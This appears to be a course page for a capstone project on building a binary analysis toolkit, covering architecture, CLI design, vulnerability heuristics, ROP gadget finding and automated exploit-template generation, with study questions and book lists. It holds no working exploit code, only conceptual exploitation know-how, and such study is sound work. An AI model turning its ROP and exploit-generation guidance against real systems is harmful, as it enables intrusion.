This capstone project synthesizes everything youโ€™ve learned across 17 projects into a unified toolkit. Youโ€™ll confront the challenges of software architecture, API design, user experience, and maintainabilityโ€”the same challenges faced by teams building tools like Binary Ninja, Ghidra, and radare2.

Concepts You Must Understand First

1. Modular Architecture and Plugin Systems

  • Separating concerns into core functionality, plugins, and user interface layers
  • Designing extensible APIs that allow new file formats and analysis techniques
  • Understanding dependency injection and inversion of control patterns

Guiding Questions:

  • How do you make your ELF/PE parsers swappable without changing the analyzer code?
  • What interface should a โ€œfile format parserโ€ plugin implement?
  • How can you support future formats (Mach-O, WASM) without rewriting existing code?

Book References:

  • โ€œClean Architectureโ€ by Robert C. Martin - Chapter 20-22: Architecture Patterns
  • โ€œDesign Patternsโ€ by Gang of Four - Chapter 5: Behavioral Patterns (Strategy, Observer)
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

2. Command-Line Interface Design

  • Creating intuitive, composable CLI commands that feel natural to users
  • Balancing power-user features with beginner-friendly defaults
  • Implementing consistent flag patterns and output formats

Guiding Questions:

  • Should binkit analyze show everything by default, or require flags like --full?
  • How do you make output both human-readable and machine-parseable?
  • Whatโ€™s the right balance between subcommands (binkit disasm) vs flags (binkit --disasm)?

Book References:

  • โ€œThe Art of UNIX Programmingโ€ by Eric S. Raymond - Chapter 10-11: CLI Design, User Interfaces
  • โ€œThe Linux Command Lineโ€ by William Shotts - Chapter 24-25: Writing Shell Scripts
  • โ€œDesigning Command-Line Interfacesโ€ (online guide)

3. Vulnerability Detection Heuristics

  • Pattern matching for dangerous functions (gets, strcpy, system)
  • Control flow analysis to detect potential exploits (unbounded loops, format strings)
  • Understanding false positives vs false negatives in static analysis

Guiding Questions:

  • How do you detect strcpy usage that might actually be safe (bounded by prior checks)?
  • Whatโ€™s the difference between a security vulnerability and a code smell?
  • How should you prioritize findings: critical, high, medium, low?

Book References:

  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 6-7: Disassembly, CFG Analysis
  • โ€œThe Art of Software Security Assessmentโ€ by Dowd, McDonald, Schuh - Chapter 7-8: Program Analysis
  • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Chapter 3-4: Exploitation Techniques

4. ROP Gadget Finding and Chain Construction

  • Searching binary for useful gadgets (pop/ret, arithmetic, syscall)
  • Understanding gadget constraints (bad bytes, alignment, clobbering)
  • Automating ROP chain construction based on target objectives

Guiding Questions:

  • How do you find gadgets that pop multiple registers in sequence?
  • Whatโ€™s the algorithm for searching a binary for pop rdi; ret patterns?
  • How do you handle position-independent executables (PIE) when building ROP chains?

Book References:

  • โ€œThe Shellcoderโ€™s Handbookโ€ by Anley et al. - Chapter 7: Return-Oriented Programming
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 11: Principles of Dynamic Analysis
  • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Chapter 5: Exploitation

5. Exploit Template Generation

  • Creating reusable pwntools templates for common vulnerabilities
  • Parameterizing exploits for different targets (local, remote, different libcs)
  • Generating descriptive comments that explain the exploit strategy

Guiding Questions:

  • How do you auto-generate the offset calculation for a buffer overflow?
  • What information should your template include: libc version, gadget addresses, shellcode?
  • How can you make the generated exploit educational, not just functional?

Book References:

  • pwntools documentation - โ€œGetting Startedโ€ and โ€œExploit Templatesโ€
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 12: Dynamic Analysis
  • CTF101 Binary Exploitation Guide (online)

6. Report Generation and Output Formatting

  • Creating clear, actionable security reports for different audiences
  • Balancing technical detail with executive summaries
  • Using visual elements (ASCII art, color coding) for clarity

Guiding Questions:

  • What should a security report include: executive summary, technical details, recommendations?
  • How do you visualize a ROP chain or control flow in a text report?
  • Should your tool output JSON for integration with other tools?

Book References:

  • โ€œThe Art of Software Security Assessmentโ€ by Dowd, McDonald, Schuh - Chapter 2: Design Review
  • โ€œWriting for Computer Scienceโ€ by Justin Zobel - Chapter 3-4: Technical Writing
  • โ€œBeautiful Codeโ€ by Oram & Wilson - Chapter 17: Pretty-Printing

7. Testing and Quality Assurance

  • Unit testing binary parsers with malformed inputs
  • Integration testing the full analysis pipeline
  • Creating a test corpus of diverse binaries

Guiding Questions:

  • How do you test your ELF parser against malicious/malformed files?
  • What binaries should be in your test suite: simple, complex, obfuscated, different architectures?
  • How do you verify that your vulnerability detection doesnโ€™t have false negatives?

Book References:

  • โ€œThe Art of Software Testingโ€ by Glenford Myers - Chapter 2-3: Test Case Design
  • โ€œWorking Effectively with Legacy Codeโ€ by Michael Feathers - Chapter 9-10: Dependency Breaking
  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Chapter 9: Binary Analysis in Practice

Questions to Guide Your Design

  1. User-Centric Design: Who is your target userโ€”CTF players, security researchers, malware analysts? How does this affect feature priorities?

  2. Scope Creep: Which features are essential for v1.0, and which can wait? Should you support Windows PE and Linux ELF initially, or just one?

  3. Performance vs Accuracy: Should vulnerability detection be fast and approximate, or slow and precise? How do you let users choose?

  4. Integration Philosophy: Should your tool replace existing tools (pwntools, checksec, ropper), or complement them? Do you wrap existing tools or reimplement?

  5. Output Flexibility: How do you support different output formats (JSON, XML, HTML, PDF) without duplicating logic?

  6. Extensibility vs Simplicity: Do you build a plugin system from day one, or start simple and refactor later?

  7. Error Handling: When analyzing a malformed binary, should you fail fast or attempt best-effort analysis?

  8. Distribution Strategy: How will users install your toolโ€”pip, git clone, Docker? Does this affect your architecture?

Thinking Exercise

Exercise 1: Architecture Design Session Sketch the high-level architecture of your toolkit:

Input Layer          Core Layer              Output Layer
[Binary File] --> [Parser] --> [Analyzer] --> [Report Generator]
                      |            |              |
                   [Plugin        [Vuln        [Console/
                    System]      Detector]      JSON/HTML]

Questions to answer:

  • What data flows between components?
  • Where do you store intermediate results (AST, CFG, symbol table)?
  • How do components communicate: function calls, message passing, shared state?

Exercise 2: API Design Design the Python API for your toolkit:

from binkit import Binary

# How should users interact with your tool?
binary = Binary.load('suspicious.elf')
binary.analyze()  # or .parse(), .disassemble()?
vulns = binary.find_vulnerabilities()
report = binary.generate_report(format='json')

# Alternative API?
from binkit import analyze
result = analyze('suspicious.elf', depth='full', output='json')

Reflection: Which API is more intuitive? More flexible? Easier to test?

Exercise 3: Test-Driven Development Before writing code, write test cases:

def test_elf_parser_handles_32bit():
    binary = Binary.load('test_binaries/hello_32.elf')
    assert binary.arch == 'i386'
    assert binary.bits == 32

def test_detects_buffer_overflow():
    binary = Binary.load('test_binaries/bof.elf')
    vulns = binary.find_vulnerabilities()
    assert any(v.type == 'buffer_overflow' for v in vulns)

Reflection: What edge cases should you test? How do you get test binaries?

Exercise 4: CLI Mockup Design the command-line interface on paper before coding:

# Option 1: Subcommands
binkit parse binary.elf
binkit analyze binary.elf --checks=all
binkit exploit binary.elf --output=pwn.py

# Option 2: Flags
binkit binary.elf --parse --analyze --exploit

# Option 3: Swiss Army Knife
binkit binary.elf  # does everything
binkit binary.elf --quick  # fast scan only

Reflection: Which design is most intuitive? Try explaining it to a colleague.

The Interview Questions Theyโ€™ll Ask

Architecture and Design:

  1. Q: How would you design a plugin system for supporting new binary formats? A: Define an abstract base class BinaryParser with methods like parse(), get_sections(), get_symbols(). Each format (ELF, PE, Mach-O) implements this interface. Use a registry pattern to discover and load parsers at runtime.

  2. Q: Your vulnerability detector has many false positives. How do you improve it? A: Implement context-aware analysis: check if dangerous functions are actually reachable, if input is validated beforehand, if buffers are properly bounds-checked. Add confidence scores to findings. Allow users to suppress false positives with configuration files.

  3. Q: How do you handle large binaries (100MB+) efficiently? A: Implement lazy loading: parse headers immediately, but only disassemble/analyze sections on-demand. Use generators instead of loading entire disassembly into memory. Consider caching analysis results to disk.

Technical Implementation:

  1. Q: How would you auto-detect the binary format (ELF vs PE vs Mach-O)? A: Read the first few bytes (magic numbers): ELF starts with \x7fELF, PE with MZ, Mach-O with \xfe\xed\xfa\xce or \xcf\xfa\xed\xfe. Implement a dispatcher that tries each parser in sequence.

  2. Q: Your ROP gadget finder is too slow. How do you optimize it? A: Instead of regex on disassembly text, search raw bytes for instruction patterns. Use a sliding window over executable sections. Cache results. Parallelize across sections. Consider using an existing library like ROPgadget or ropper.

  3. Q: How do you test your tool against malicious/malformed binaries without compromising security? A: Run tests in Docker containers or VMs. Use fuzzing to generate malformed inputs. Include known-bad binaries (malware samples) in test suite. Implement timeout mechanisms for analysis that hangs.

Tool Integration:

  1. Q: Should your tool reimplement disassembly or use Capstone/LLVM? A: Use existing libraries like Capstone for disassemblyโ€”itโ€™s battle-tested, supports multiple architectures, and is well-maintained. Focus your effort on higher-level analysis, not reinventing wheels.

  2. Q: How would you integrate your tool with CI/CD pipelines for automated binary analysis? A: Support JSON output for machine parsing. Provide exit codes indicating severity (0=no vulns, 1=low, 2=high, etc.). Allow configuration via files (.binkit.yml). Generate reports in standard formats (SARIF, JSON).

User Experience:

  1. Q: A user reports your tool crashes on a specific binary. How do you debug? A: Ask for the binary sample (if shareable). Add verbose logging (--debug flag). Wrap risky operations in try/except with detailed error messages. Create a minimal reproduction case and add to test suite.

  2. Q: How do you make your complex tool approachable for beginners? A: Provide sensible defaults (just run binkit binary.elf). Include a tutorial/quickstart. Generate helpful error messages. Add --examples flag showing common use cases. Create comprehensive documentation with screenshots.

Books That Will Help

Topic Book Chapters Why It Helps
Software Architecture โ€œClean Architectureโ€ by Robert C. Martin Ch 15-22: Architecture, Components Learn how to structure a large system into maintainable, testable modules
CLI Design โ€œThe Art of UNIX Programmingโ€ by Eric S. Raymond Ch 10-11: CLI Design, Interfaces Design command-line tools that feel natural and compose well with other tools
Binary Analysis Foundation โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 1-9: All chapters Comprehensive guide to everything your toolkit needs to doโ€”this is your blueprint
Testing Strategy โ€œThe Art of Software Testingโ€ by Glenford Myers Ch 2-5: Test Design, Techniques Learn how to test your binary parser and analysis engine thoroughly
Python Best Practices โ€œFluent Pythonโ€ by Luciano Ramalho Ch 5-7: Classes, Objects, Functions Write clean, Pythonic code for your toolkitโ€”proper OOP, generators, decorators
Vulnerability Detection โ€œThe Art of Software Security Assessmentโ€ by Dowd, McDonald, Schuh Ch 7-8: Program Analysis Understand what vulnerabilities look like and how to detect them programmatically
ROP and Exploitation โ€œThe Shellcoderโ€™s Handbookโ€ by Anley et al. Ch 7: Return-Oriented Programming Learn ROP fundamentals to build your gadget finder and chain constructor
Disassembly Deep Dive โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ by Bryant & Oโ€™Hallaron Ch 3: Machine-Level Programming Understand instruction encoding for disassembler integration
File Format Specs โ€œPractical Binary Analysisโ€ by Dennis Andriesse Ch 2-3: ELF Format, PE Format Reference for parsing binary formats correctly
Tool Development โ€œBeautiful Codeโ€ by Oram & Wilson Ch 2, 9, 17: Various tool chapters Learn from examples of well-designed analysis tools and libraries
Project Organization โ€œThe Pragmatic Programmerโ€ by Hunt & Thomas Ch 1-2: Pragmatic Philosophy, Approach Best practices for organizing and evolving a large codebase
Error Handling โ€œRelease It!โ€ by Michael Nygard Ch 4-5: Stability Patterns Learn how to make your tool robust against malformed inputs and edge cases


Project Comparison Table

# Project Difficulty Time Key Skill Fun
1 ELF Parser โญโญ 1-2 weeks File Formats โญโญโญ
2 PE Parser โญโญ 1-2 weeks Windows Formats โญโญโญ
3 Disassembler โญโญโญ 2-4 weeks Instruction Encoding โญโญโญโญ
4 GDB Deep Dive โญโญ 1-2 weeks Debugging โญโญโญโญ
5 Ghidra RE โญโญ 2-3 weeks Static Analysis โญโญโญโญ
6 Crackmes โญโญ 2-4 weeks Reverse Engineering โญโญโญโญโญ
7 Buffer Overflow โญโญโญ 3-4 weeks Exploitation โญโญโญโญโญ
8 ROP Chains โญโญโญโญ 2-3 weeks Advanced Exploitation โญโญโญโญโญ
9 strace/ltrace โญ 3-5 days Dynamic Analysis โญโญโญ
10 Malware Lab โญโญโญ 4-6 weeks Malware Analysis โญโญโญโญโญ
11 angr โญโญโญโญ 2-3 weeks Symbolic Execution โญโญโญโญ
12 Fuzzing โญโญโญ 2-3 weeks Vulnerability Discovery โญโญโญโญ
13 Binary Diffing โญโญ 1-2 weeks Patch Analysis โญโญโญ
14 Anti-Debug Bypass โญโญโญ 2-3 weeks Anti-Analysis โญโญโญโญ
15 Decompiler โญโญโญโญโญ 2-3 months Code Recovery โญโญโญโญ
16 CTF Practice โญโญโญ Ongoing Competition Skills โญโญโญโญโญ
17 radare2 Mastery โญโญ 2-3 weeks CLI Tools โญโญโญโญ
18 Complete Toolkit โญโญโญโญโญ 2-3 months Integration โญโญโญโญ

Phase 1: Foundations (4-6 weeks)

Build understanding of binary formats and tools:

  1. Project 1: ELF Parser - Understand Linux binaries
  2. Project 2: PE Parser - Understand Windows binaries
  3. Project 4: GDB Deep Dive - Master debugging
  4. Project 9: strace/ltrace - Quick dynamic analysis

Phase 2: Reverse Engineering (4-6 weeks)

Learn to understand unknown binaries:

  1. Project 5: Ghidra RE - Static analysis
  2. Project 17: radare2 Mastery - CLI analysis
  3. Project 6: Crackme Challenges - Apply skills

Phase 3: Exploitation (6-8 weeks)

Learn to exploit vulnerabilities:

  1. Project 7: Buffer Overflow - Basic exploitation
  2. Project 8: ROP Chains - Bypass protections
  3. Project 16: CTF Practice - Competition experience

Phase 4: Advanced Analysis (6-8 weeks)

Master advanced techniques:

  1. Project 10: Malware Lab - Real-world analysis
  2. Project 11: angr - Automated analysis
  3. Project 12: Fuzzing - Vulnerability discovery
  4. Project 14: Anti-Debug Bypass - Defeat protections

Phase 5: Mastery (2-4 months)

Build professional tools:

  1. Project 3: Disassembler - Deep instruction knowledge
  2. Project 13: Binary Diffing - Patch analysis
  3. Project 15: Decompiler - Code recovery
  4. Project 18: Complete Toolkit - Professional tools

Summary

# Project Main Language
1 ELF File Parser C
2 PE File Parser C
3 Build a Disassembler C
4 GDB Debugging Deep Dive GDB/Python
5 Ghidra Reverse Engineering Ghidra/Java
6 Crackme Challenges Assembly/Python
7 Buffer Overflow Exploitation C/Python
8 Return-Oriented Programming Python
9 Dynamic Analysis (strace/ltrace) Shell
10 Malware Analysis Lab Assembly/Python
11 Symbolic Execution (angr) Python
12 Fuzzing with AFL++ C/Shell
13 Binary Diffing Python
14 Anti-Debugging Bypass Assembly/Python
15 Build a Decompiler Python
16 CTF Binary Exploitation Python
17 radare2 Mastery r2/Python
18 Complete Binary Analysis Toolkit Python

Resources

Essential Books

  • โ€œPractical Binary Analysisโ€ by Dennis Andriesse - Best overall introduction
  • โ€œHacking: The Art of Exploitationโ€ by Jon Erickson - Classic exploitation book
  • โ€œPractical Malware Analysisโ€ by Sikorski & Honig - Malware-focused
  • โ€œReversing: Secrets of Reverse Engineeringโ€ by Eldad Eilam - In-depth RE
  • โ€œThe Shellcoderโ€™s Handbookโ€ - Advanced exploitation

Tools

  • Ghidra: https://ghidra-sre.org/ - Free decompiler
  • radare2: https://rada.re/ - Open source RE framework
  • pwntools: https://docs.pwntools.com/ - Exploit development
  • angr: https://angr.io/ - Binary analysis framework
  • AFL++: https://aflplus.plus/ - Fuzzer

Practice Platforms

  • pwnable.kr: https://pwnable.kr/ - CTF challenges
  • crackmes.one: https://crackmes.one/ - Reverse engineering
  • ROP Emporium: https://ropemporium.com/ - ROP practice
  • Nightmare: https://guyinatuxedo.github.io/ - Walkthroughs

Reference Materials


Total Estimated Time: 8-12 months of dedicated study

After completion: Youโ€™ll be able to analyze any binary, find vulnerabilities, write exploits, analyze malware, and build professional reverse engineering tools. These skills are in high demand for security research, vulnerability assessment, malware analysis, and CTF competitions.